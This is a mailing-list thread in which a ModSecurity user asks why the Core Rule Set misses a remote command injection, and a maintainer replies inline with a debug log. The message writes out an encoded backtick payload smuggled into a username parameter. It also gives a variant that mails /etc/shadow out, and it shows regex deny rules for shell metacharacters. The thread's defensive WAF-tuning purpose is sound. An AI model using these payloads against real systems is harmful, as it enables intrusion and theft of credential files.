On Fri, Aug 16, 2013 at 3:18 AM, rewt rewt <rewt@linux-elite.org> wrote:
Hello,
I have a big issue with modsecurity detecting a simple Remote Command Execution.
My WAF config is Modsecurity 2.7.1 with core rules based on scoring but however i don t have any logging for that request:

GET http://OBFUSCATED/application.pl?action=deleteaccount&username=%60ls%20/root/%20%3E%20/tmp/root%60&redirectionemail= HTTP/1.1

(also work for mail my@email.Com < /etc/shadow)

It is simple not detected in logs!!!
I clearly don t understand why... it should be triggered by the "common attack" rules of the CRS activated rules in my opinion.


The CRS does detect that attack, as seen here:
http://www.modsecurity.org/demo/demo-deny.html?test=username%3D%60ls+%2Froot%2F+%3E+%2Ftmp%2Froot%60%26redirectionemail%3D
 
Can you increast you debug log level to 9 and send me your debug log privately?


I tried this without sucess:
SecRule ARGS "(;|\||\`)" "phase:3,t:none,log,deny,id:5000148"

As an aside, its normally a good idea to stop an attack at the first point possible. For the ARGS collection that is in phase 2. Having said your rule above works as expected:

#curl localhost/test?abc=%3B

# less /opt/modsecurity/var/log/debug.log
[18/Aug/2013:12:09:33 +0300] [localhost/sid#7f3cf0993e68][rid#7f3cf08a10a0][/test.html][5] Rule 7f3cf08e3e90: SecRule "ARGS" "@rx (;|\\||\\`)" "phase:3,auditlog,t:none,log,deny,id:5000148"
[18/Aug/2013:12:09:33 +0300] [localhost/sid#7f3cf0993e68][rid#7f3cf08a10a0][/test.html][4] Transformation completed in 0 usec.
[18/Aug/2013:12:09:33 +0300] [localhost/sid#7f3cf0993e68][rid#7f3cf08a10a0][/test.html][4] Executing operator "rx" with param "(;|\\||\\`)" against ARGS:abc.
[18/Aug/2013:12:09:33 +0300] [localhost/sid#7f3cf0993e68][rid#7f3cf08a10a0][/test.html][9] Target value: ";"
[18/Aug/2013:12:09:33 +0300] [localhost/sid#7f3cf0993e68][rid#7f3cf08a10a0][/test.html][6] Ignoring regex captures since "capture" action is not enabled.
[18/Aug/2013:12:09:33 +0300] [localhost/sid#7f3cf0993e68][rid#7f3cf08a10a0][/test.html][4] Operator completed in 34 usec.
[18/Aug/2013:12:09:33 +0300] [localhost/sid#7f3cf0993e68][rid#7f3cf08a10a0][/test.html][4] Rule returned 1.
[18/Aug/2013:12:09:33 +0300] [localhost/sid#7f3cf0993e68][rid#7f3cf08a10a0][/test.html][9] Match, intercepted -> returning.
[18/Aug/2013:12:09:33 +0300] [localhost/sid#7f3cf0993e68][rid#7f3cf08a10a0][/test.html][1] Access denied with code 403 (phase 3). Pattern match "(;|\\||\\`)" at ARGS:abc. [file "/opt/modsecurity/etc/rules.conf"] [line "9"] [id "5000148"]

--
 - Josh
 
and

SecRule ARGS ";" "phase:3,t:none,log,deny,id:5000148"
(i tried it with phase 2 or 1 attack still succeed)

Another interesting option could be to increase the score only for that virtual host but i don t think it would be helpful as it is not detected.

Any help would be much appreciated !

Many thanks

David R


------------------------------------------------------------------------------
Get 100% visibility into Java/.NET code with AppDynamics Lite!
It's a free troubleshooting tool designed for production.
Get down to code-level detail for bottlenecks, with <2% overhead.
Download for free and get started troubleshooting in minutes.
http://pubads.g.doubleclick.net/gampad/clk?id=48897031&iu=/4140/ostg.clktrk
_______________________________________________
mod-security-users mailing list
mod-security-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/mod-security-users
Commercial ModSecurity Rules and Support from Trustwave's SpiderLabs:
http://www.modsecurity.org/projects/commercial/rules/
http://www.modsecurity.org/projects/commercial/support/